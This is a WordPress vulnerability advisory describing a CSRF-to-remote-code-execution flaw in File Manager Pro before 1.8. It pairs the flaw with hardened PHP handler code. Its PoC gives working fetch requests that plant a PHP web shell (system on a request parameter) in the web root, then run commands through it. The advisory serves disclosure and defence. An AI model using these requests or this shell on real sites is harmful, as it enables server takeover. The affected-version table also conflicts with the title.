Source: wpvulndb | Author: Dmitrii Ignatyev | WPVDB-ID: D4DAF0E1-8018-448A-964C-427A355E005F
History: Sep 11, 2023 - 12:00 a.m.

File Manager Pro < 1.8 - Remote Code Execution via CSRF

2023-09-11 00:00:00
Dmitrii Ignatyev
wpscan.com
Tags: remote code execution, csrf, file manager pro, ajax action, super admin, nonces, web shell, logged-out attacker

AI Score: 8.5 High (Confidence: High)
EPSS: 0.001 Low (Percentile: 37.6%)

Description: The plugin does not properly check the CSRF nonce in the fs_connector AJAX action. Because the action accepts its parameters from plain GET requests, an attacker can make a highly privileged user (such as a Super Admin) perform unwanted file-system actions via CSRF, including writing a web shell into the web root.

PoC

As a Super Admin, run the following code in the browser console (note that the requests do not require nonces):

    // Create an empty shell.php in the connector's root directory.
    // The target hash l1_Lw is the base64 encoding of "/" with padding stripped.
    await fetch("/wp-admin/admin-ajax.php?action=fs_connector&cmd=mkfile&name=shell.php&target=l1_Lw");
    // Write PHP into it. l1_c2hlbGwucGhw is the base64 encoding of "shell.php".
    await fetch("/wp-admin/admin-ajax.php?action=fs_connector&cmd=put&target=l1_c2hlbGwucGhw&content=%3C?php%20echo%20system($_REQUEST%5B'cmd'%5D);");

Now a logged-out attacker may access shell.php as follows:

    await (await fetch("/shell.php?cmd=id")).text()
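The PoC works because the handler behind `action=fs_connector` neither verifies a nonce nor refuses GET. The following is an added example of the vulnerable pattern beside a hardened handler; it is not File Manager Pro's own code. The `fmp_` function names, the `fmp_connector_nonce` action string and the `fmp_run_connector_command` placeholder are assumptions; the WordPress API calls (`check_ajax_referer`, `current_user_can`, `wp_create_nonce`, `wp_localize_script`) are real.

```php
<?php
// Added example (not the plugin's code). Names prefixed fmp_ are assumptions.

// Placeholder for the plugin's real file-system connector (elFinder-style
// commands such as mkfile/put). Its internals are out of scope here.
function fmp_run_connector_command( $cmd, array $args ) {
    // ... dispatch $cmd against the configured root directory ...
}

// VULNERABLE pattern: the only gate is "is the caller logged in with the
// right role". The browser attaches the admin's cookie to any request,
// including a cross-site GET (an <img src=...> on an attacker's page), and
// $_REQUEST accepts query-string parameters, so CSRF works.
function fmp_connector_vulnerable() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $cmd = isset( $_REQUEST['cmd'] ) ? sanitize_key( $_REQUEST['cmd'] ) : '';
    fmp_run_connector_command( $cmd, $_REQUEST );
    wp_die();
}

// HARDENED pattern: require a nonce bound to this action and to the current
// user, reject GET for state-changing work, then check capability.
function fmp_connector_hardened() {
    // A cross-site page cannot read the nonce, so it cannot forge this.
    // On failure check_ajax_referer() dies with -1 and HTTP 403.
    check_ajax_referer( 'fmp_connector_nonce', '_ajax_nonce' );

    // Writing files is state-changing; do not let it happen via GET at all.
    if ( 'POST' !== $_SERVER['REQUEST_METHOD'] ) {
        wp_send_json_error( 'method not allowed', 405 );
    }

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // Read only from $_POST so query-string parameters are ignored.
    $cmd = isset( $_POST['cmd'] ) ? sanitize_key( $_POST['cmd'] ) : '';
    fmp_run_connector_command( $cmd, $_POST );
    wp_die();
}

// Register only the authenticated hook; no wp_ajax_nopriv_ variant exists,
// so anonymous users never reach the connector.
add_action( 'wp_ajax_fs_connector', 'fmp_connector_hardened' );

// Client side: pass a fresh nonce to the plugin's script so legitimate
// requests can send it as the _ajax_nonce POST field.
function fmp_enqueue_admin_script() {
    wp_enqueue_script( 'fmp-admin', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'fmp-admin', 'fmpAjax', array(
        'url'   => admin_url( 'admin-ajax.php' ),
        'nonce' => wp_create_nonce( 'fmp_connector_nonce' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'fmp_enqueue_admin_script' );
```

Two caveats a reviewer would raise: a nonce check stops CSRF but not an attacker who already runs script in the admin's origin (an XSS elsewhere on the site), and the PoC shows the connector's root mapped to the web root, so even a nonce-protected connector should keep its root outside directories the web server executes PHP from.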

Affected software

    CPE Name    Operator    Version
                eq          1.8

